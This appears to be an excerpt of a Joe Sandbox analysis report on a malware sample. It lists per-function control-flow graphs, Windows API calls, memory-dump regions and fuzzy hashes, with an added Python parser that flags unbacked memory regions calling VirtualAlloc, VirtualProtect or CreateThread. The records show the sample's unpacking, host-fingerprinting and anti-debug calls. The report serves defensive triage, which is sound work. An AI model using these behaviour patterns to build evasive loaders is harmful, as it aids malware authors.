                                                                                                                                                                      • API ID: CloseHandleInitialize_getenv_malloc_memset
                                                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                      • API String ID: 2812500916-3543104150
                                                                                                                                                                      • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                      • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 4bf99b2000ace72936b72d77f6c937232e1dc6fdeaa520fa9892a52d394af213
                                                                                                                                                                      • Instruction ID: 6c671c0cc518218c71236e535eef93dc8ad6d6df43b153c7268b01f9ef2095ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 4bf99b2000ace72936b72d77f6c937232e1dc6fdeaa520fa9892a52d394af213
                                                                                                                                                                      • Instruction Fuzzy Hash: 2BE157A590D7419ECB3A47289C097762BA06F72771F5C0796F4A2D61F2EDA48C08F237

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 525 40af66-40af6e 526 40af7d-40af88 call 40b84d 525->526 529 40af70-40af7b call 40d2e3 526->529 530 40af8a-40af8b 526->530 529->526 533 40af8c-40af98 529->533 534 40afb3-40afca call 40af49 call 40cd39 533->534 535 40af9a-40afb2 call 40aefc call 40d2bd 533->535 535->534
                                                                                                                                                                      APIs
                                                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,?,?,0040D128,00000001,?,?,?,?,?,0040AF59,?), ref: 0040B8C4
                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                                                      • Opcode ID: b345fa5dd82e9b4f5c74ef0e5f3feb58fb763bf4bd372753273fca7b37c13978
                                                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                                      • Opcode Fuzzy Hash: b345fa5dd82e9b4f5c74ef0e5f3feb58fb763bf4bd372753273fca7b37c13978
                                                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Control-flow Graph
control_flow_graph 544 d37df0-d37dfa 545 d37e00 544->545 546 d38288-d3829a call d20d80 544->546 545->546 548 d37e06-d37e15 GetComputerNameW 545->548 552 d382a0 546->552 553 d3851e-d3852d call d20d80 546->553 550 d382b6-d382bb 548->550 551 d37e1b 548->551 551->550 554 d37e21-d37e2d 551->554 552->553 555 d382a6 552->555 558 d37dbc-d37dce 555->558 559 d382ac 555->559 566 d37d35 558->566 567 d37d6c-d37d80 GetVolumeInformationW 558->567 562 d382b2-d382b4 559->562 563 d37d20-d37d2b 559->563 562->550 564 d37d61-d37d68 563->564 565 d37d2d-d37d94 563->565 570 d37de5-d37dea 564->570 571 d37d6a 564->571 565->564 575 d37d96 565->575 566->567 569 d37d37-d37d39 566->569 572 d37d3b-d37d46 569->572 573 d37d83-d37d8c GetWindowsDirectoryW 570->573 574 d37dec 570->574 571->567 571->570 576 d37d97-d37d98 572->576 577 d37d48-d37dac 572->577 573->572 579 d37d8e-d37da6 573->579 574->573 578 d37dee 574->578 575->576 582 d37de2 576->582 583 d37d9a-d37d9f 576->583 577->576 585 d37dae-d37db3 577->585 578->544 579->558 584 d37da8 579->584 584->558 586 d37daa-d37dba 584->586 586->558
APIs
Memory Dump Source
• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: 30c8bedb3fdf1f77f525af28aebae08b3c563a708bc1f3cce617822420f570f3
• Instruction ID: e018e2d24c5f3d90b4c21939127abba28d8120d0513b723b0ff8cf5b62d98184
• Opcode Fuzzy Hash: 30c8bedb3fdf1f77f525af28aebae08b3c563a708bc1f3cce617822420f570f3
• Instruction Fuzzy Hash: CB2137F4A4DB44FFDA355718BC06BB93A746F62B10F8C448AF8C8561D2D5A86C08D277

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 588 d15a3b-d15a3f 589 d15a45 588->589 590 d14f7c-d14f91 588->590 591 d15a4b-d15b37 CreateThread RtlExitUserThread call d15d20 589->591 592 d151ae-d151d6 589->592 605 d15b3c-d15b51 591->605
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00D155C0,?,00000000,00000000), ref: 00D15A51
                                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 00D15B11
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$CreateExitUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4108186749-0
                                                                                                                                                                      • Opcode ID: 5bf56e9ae101de6de6f23c76d907f5a9a7472b8b9d6eef196e720cb5d7295516
                                                                                                                                                                      • Instruction ID: d61f43656f190db87e58a1fe8939de48a95d584e51febcd8c24b4cbe8f4af90a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5bf56e9ae101de6de6f23c76d907f5a9a7472b8b9d6eef196e720cb5d7295516
                                                                                                                                                                      • Instruction Fuzzy Hash: E511FB1150DBC2EED7138B6878253A6BFA05FA2720F5D06CAD0D14E1DACA5D498C97B3

Control-flow Graph
control_flow_graph 683 d15d20 684 d15d22 683->684 685 d15d26-d15d2d 683->685 684->685 686 d15d24 684->686 687 d15d36-d15d37 685->687 688 d15d2f 685->688 686->685 689 d15d39-d15d42 VirtualAlloc 687->689 690 d15d5d 687->690 688->687 691 d15d30-d15d31 688->691 692 d15d33-d15d35 689->692 693 d15d44 689->693 694 d15d64 690->694 695 d15d5f 690->695 691->692 692->687 693->692 696 d15d46-d15d50 693->696 698 d15d66 694->698 699 d15d69-d15d73 VirtualFree 694->699 695->694 697 d15d61 695->697 700 d15d52 696->700 701 d15d54-d15d5b 696->701 697->694 702 d15d63 697->702 698->699 703 d15d68 698->703 700->701 701->690 701->694 702->694 703->699
APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00D15D6D
Memory Dump Source
• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 051e81782a83acd00b91df716f924aa9f748da9625b79b21f6ba2053fd3f53a1
• Instruction ID: 3a803d116eb7203750ef16afa4399f59373a1409fcd65895bfb0b2f4b3209b36
• Opcode Fuzzy Hash: 051e81782a83acd00b91df716f924aa9f748da9625b79b21f6ba2053fd3f53a1
• Instruction Fuzzy Hash: 19F0B491A04F00FADE7E0368FD4EBF12A2067E1729F0C4145AA41591BE8E5D1CC6C732

Control-flow Graph
control_flow_graph 704 74bf4c0-74bf574 VirtualProtect 707 74bf57d-74bf5c5 704->707 708 74bf576-74bf57c 704->708 708->707
APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 074BF564
Memory Dump Source
• Source File: 0000002A.00000002.2660779676.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_74b0000_vbc.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: ee74fb32430a578decbb40d4091a04ee43fcd5610cbab7c8829f61b44ed4c122
• Instruction ID: e4172cdb25a28aaa09bfc5db25ef30283d591c6ba8a6cd79d19e6af02b608339
• Opcode Fuzzy Hash: ee74fb32430a578decbb40d4091a04ee43fcd5610cbab7c8829f61b44ed4c122
• Instruction Fuzzy Hash: C531A7B8D012089FCF20CFA9D984ADEFBF0BB49310F10942AE818B7210D735A945CF68

Control-flow Graph
control_flow_graph 713 401870-401883 call 40af66 716 4018b2 713->716 717 401885-4018a2 SysAllocString 713->717 718 4018b4-4018b8 716->718 717->718 719 4018a4-4018a6 717->719 721 4018c4-4018c9 718->721 722 4018ba-4018bf call 40ad90 718->722 719->718 720 4018a8-4018ad call 40ad90 719->720 720->716 722->721
APIs
  • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
• SysAllocString.OLEAUT32 ref: 00401898
Memory Dump Source
• Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_vbc.jbxd
Similarity
• API ID: AllocString_malloc
• String ID:
• API String ID: 959018026-0
• Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
• Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
• Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
• Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Control-flow Graph
control_flow_graph 725 d14b70-d14b7c GetUserDefaultUILanguage 726 d14b82 725->726 727 d14c19 725->727 726->727 728 d14b88-d14b8e 726->728 729 d14f26-d14f2f 727->729 730 d14c1f-d14c24 727->730 731 d14e82 729->731 732 d14f35 729->732 733 d14e84 731->733 734 d14ebb-d14ec9 731->734 732->731 735 d14f3b 732->735 737 d14e50 733->737 738 d14ea3 733->738 735->735 737->738 739 d14e52 737->739 739->731
APIs
• GetUserDefaultUILanguage.KERNEL32(771B2EE0,00000001,?,0000004C,00000000,Function_00004F70,00000000,00000000), ref: 00D14B76
Memory Dump Source
• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
Similarity
• API ID: DefaultLanguageUser
• String ID:
• API String ID: 95929093-0
• Opcode ID: a39534d83b044c63ee524c14764bb7529c6b1c4b4c8a7b92f50416e732785cdd
• Instruction ID: 80409aef0daf34f305591285f54b6976c1c22cc0fbd771e0c61e4006bb1f39a6
• Opcode Fuzzy Hash: a39534d83b044c63ee524c14764bb7529c6b1c4b4c8a7b92f50416e732785cdd
• Instruction Fuzzy Hash: 0BE0D859905612F6DE70462879014F46100BB10321FED0783B576C38D18E548DC051B3
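
The function records in this section are machine-generated and become useful for triage once parsed: by API call, by dumped memory region, or by fuzzy hash. The Python below is an added example written for this page, not Joe Sandbox tooling. It parses the record layout shown above from a constructed sample assembled from three of this report's records (edge lists trimmed), groups API calls by the dumped region they were found in, and flags functions that live in a region not backed by a PE image and call memory or thread primitives. The `MEMORY_PRIMITIVES` set and the flagging rule are the example's own heuristic, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox per-function records ('Control-flow Graph ... Similarity'
blocks) into dicts and pivot on them.  Added example; not Joe Sandbox code."""
import re
from collections import defaultdict

# One API call line, with or without an argument list, optionally inside a subcall note.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w:@]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(
    r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")
SKIP = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Executed", "Not Executed"}
# Heuristic (this example's own): primitives that, called from a region not backed by a
# PE image, mark a loader/unpacker stage worth looking at first.
MEMORY_PRIMITIVES = {"VirtualAlloc", "VirtualProtect", "VirtualFree", "CreateThread",
                     "CreateRemoteThread", "WriteProcessMemory", "NtWriteVirtualMemory"}

# Constructed sample: three records from this report, edge lists trimmed, hash fields reduced.
SAMPLE = """\
Control-flow Graph
control_flow_graph 588 d15a3b-d15a3f 589 d15a45 588->589 591 d15a4b-d15b37 CreateThread RtlExitUserThread call d15d20 589->591
APIs
• CreateThread.KERNEL32(00000000,00000000,00D155C0,?,00000000,00000000), ref: 00D15A51
• RtlExitUserThread.NTDLL(00000000), ref: 00D15B11
Memory Dump Source
• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Similarity
• API ID: Thread$CreateExitUser
• String ID:
• Instruction Fuzzy Hash: E511FB1150DBC2EED7138B6878253A6BFA05FA2720F5D06CAD0D14E1DACA5D498C97B3
Control-flow Graph
control_flow_graph 704 74bf4c0-74bf574 VirtualProtect 707 74bf57d-74bf5c5 704->707 708 74bf576-74bf57c 704->708 708->707
APIs
• VirtualProtect.KERNEL32(?,?,?,?), ref: 074BF564
Memory Dump Source
• Source File: 0000002A.00000002.2660779676.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
Similarity
• API ID: ProtectVirtual
• Instruction Fuzzy Hash: C531A7B8D012089FCF20CFA9D984ADEFBF0BB49310F10942AE818B7210D735A945CF68
Control-flow Graph
control_flow_graph 713 401870-401883 call 40af66 717 401885-4018a2 SysAllocString 713->717
APIs
  • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
• SysAllocString.OLEAUT32 ref: 00401898
Memory Dump Source
• Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
Similarity
• API ID: AllocString_malloc
• Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
"""


def parse_records(text):
    """Split at each 'Control-flow Graph' header and parse one record per block."""
    records = []
    for chunk in re.split(r"^Control-flow Graph *$", text, flags=re.M)[1:]:
        rec = {"cfg": None, "apis": [], "associated": [], "pe_backed": None}
        for raw in chunk.splitlines():
            # Drop bullets and the "Download File" link text left over from the HTML export.
            line = raw.strip().lstrip("• ").removesuffix("Download File").strip()
            if not line or line in SKIP:
                continue
            if line.startswith("control_flow_graph "):
                rec["cfg"] = line.split(" ", 1)[1]
            elif m := API_RE.match(line):
                call = m.groupdict()
                call["subcall_of"] = call.pop("sub")  # enclosing subcall address, or None
                rec["apis"].append(call)
            elif m := SRC_RE.match(line):
                rec["source_file"], rec["offset"] = m["file"], m["offset"]
                rec["pe_backed"] = m["pe"] == "true"
            elif m := KV_RE.match(line):
                key, val = m["key"], m["val"]
                if key == "Associated":
                    rec["associated"].append(val)
                else:
                    rec[key.lower().replace(" ", "_")] = val  # e.g. "API ID" -> api_id
        records.append(rec)
    return records


def apis_by_region(records):
    """API names called by functions in each dumped region, keyed by .sdmp file name."""
    out = defaultdict(set)
    for r in records:
        for call in r["apis"]:
            out[r.get("source_file", "?")].add(call["name"])
    return dict(out)


def flag_unbacked_memory_code(records):
    """(offset, primitives) for functions in non-PE-backed regions touching MEMORY_PRIMITIVES.
    A JIT or a benign packer trips this too; it orders functions for review, nothing more."""
    hits = []
    for r in records:
        names = {call["name"] for call in r["apis"]} & MEMORY_PRIMITIVES
        if r["pe_backed"] is False and names:
            hits.append((r["offset"], sorted(names)))
    return hits


def instruction_fuzzy_hashes(records):
    """Instruction fuzzy hashes, a field analysts pivot on across samples of one family."""
    return sorted(r["instruction_fuzzy_hash"] for r in records if "instruction_fuzzy_hash" in r)
```

Run against the full report text, `flag_unbacked_memory_code` surfaces the two regions this section already shows as `based on PE: false`: 00D10000, whose functions call CreateThread, VirtualAlloc and VirtualFree, and 074B0000, whose function calls VirtualProtect. The PE-backed image at 00400000 (SysAllocString, HeapCreate) is not flagged. Treat the flag as a reading order, not a verdict; the `0x00000040` field in the dump file name is the page protection recorded by the sandbox, and the parser deliberately does not interpret the other numeric fields.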

Control-flow Graph

Basic blocks (id: address range): 740: 40d534-40d556 (calls HeapCreate); 741: 40d558-40d559; 742: 40d55a-40d563. Edges: 740->741, 740->742.
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
Memory Dump Source
• Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_400000_vbc.jbxd
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
• Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Control-flow Graph

Basic blocks (id: address range): 743: 74bf790-74bf81e (calls CloseHandle); 746: 74bf820-74bf826; 747: 74bf827-74bf869. Edges: 743->746, 743->747, 746->747.
Memory Dump Source
• Source File: 0000002A.00000002.2660779676.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_74b0000_vbc.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 754eee8723e5ba5089f63256270bc6e5c4d2ef3e108253d9d01eef48c0158242
• Instruction ID: e72549c31421d844f99b9fcda6e1c4a3e953ad2bdbd416f87d9f82b0bf1653e3
• Opcode Fuzzy Hash: 754eee8723e5ba5089f63256270bc6e5c4d2ef3e108253d9d01eef48c0158242
• Instruction Fuzzy Hash: 8831ABB4D112189FCF24CFAAD985ADEFBF4AB49310F14942AE819B7340C735A905CFA4
Memory Dump Source
• Source File: 0000002A.00000002.2655283229.000000000731D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0731D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_731d000_vbc.jbxd
Similarity (no API or string references)
• Opcode ID: 5fd1a686c0a123e8c933f5b56b8b9d4b434c6ba1fcde1373798f30149555eefb
• Instruction ID: af28647e8c7393fc12cbf0ddb03465dc8f3e5d25c919d2590b463f11cbf91b85
• Opcode Fuzzy Hash: 5fd1a686c0a123e8c933f5b56b8b9d4b434c6ba1fcde1373798f30149555eefb
• Instruction Fuzzy Hash: CD2122F5614200DFEB18DF14D9C0B26BBA5EB85314F20C66DD80D0B246C336D847CA63

Memory Dump Source
• Source File: 0000002A.00000002.2655283229.000000000731D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0731D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_731d000_vbc.jbxd
Similarity (no API or string references)
• Opcode ID: 49f01ab7346092539da7b2fb4ebb366b6ab3489dd262bc957b6d93f642452a5a
• Instruction ID: ab9eee1df1558e4090bc8b67d018b2e2f042ff0ec2ef097cbb4970e5acfd51c0
• Opcode Fuzzy Hash: 49f01ab7346092539da7b2fb4ebb366b6ab3489dd262bc957b6d93f642452a5a
• Instruction Fuzzy Hash: ED11BEB5604280CFDB15CF14D9C4B15BF62FB85314F24C6AAD8494B656C33AD84ACB62

Memory Dump Source
• Source File: 0000002A.00000002.2652822744.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_730d000_vbc.jbxd
Similarity (no API or string references)
• Opcode ID: 585b31c1e31f64ddb67b90e75ab235d24d11fd3da3f868802bcc532aad241ec0
• Instruction ID: 95ddf219796f7cf62e5186d5ba97c4e475e08c3a0ddcea2f4b0c646b8ba01f18
• Opcode Fuzzy Hash: 585b31c1e31f64ddb67b90e75ab235d24d11fd3da3f868802bcc532aad241ec0
• Instruction Fuzzy Hash: 26015EB154D3C09FE7124B258C98752BFA8EF43224F1981DBE8888F1E3C2685C45CBB2

Memory Dump Source
• Source File: 0000002A.00000002.2652822744.000000000730D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0730D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_730d000_vbc.jbxd
Similarity (no API or string references)
• Opcode ID: e4ad30accb07ff557f2ad0075c76f99f343baf77bf5ebff490170698c389a000
• Instruction ID: 9cf0c62c1190ae8aa812712ab339a9aa0981192a9f4be94d54d47f1887175720
• Opcode Fuzzy Hash: e4ad30accb07ff557f2ad0075c76f99f343baf77bf5ebff490170698c389a000
• Instruction Fuzzy Hash: 9B01D4F16143409AF7204A51CC84B66BFC8EF42225F08C029EC4C0B5C2C2789845CAF7

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00D51459
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00D51463
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00D51470
Memory Dump Source
• Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 3cf6d14e918ff889318cc528b09367911a1633efb82f107397c3a16bb5ad504b
• Instruction ID: 94f566506f8c97f1d9135320cf5ca86c7ab1bdd06aba0ef34befb1814bfb9889
• Opcode Fuzzy Hash: 3cf6d14e918ff889318cc528b09367911a1633efb82f107397c3a16bb5ad504b
• Instruction Fuzzy Hash: 2531C675901328ABCF21DF68D98979CBBB8EF48311F5042DAE81DA7250E7309F858F65

APIs
• GetCurrentProcess.KERNEL32(00000003,?,00D53F13,00000003,00D6DE80,0000000C,00D5403D,00000003,00000002,00000000,?,00D52038,00000003), ref: 00D53F5E
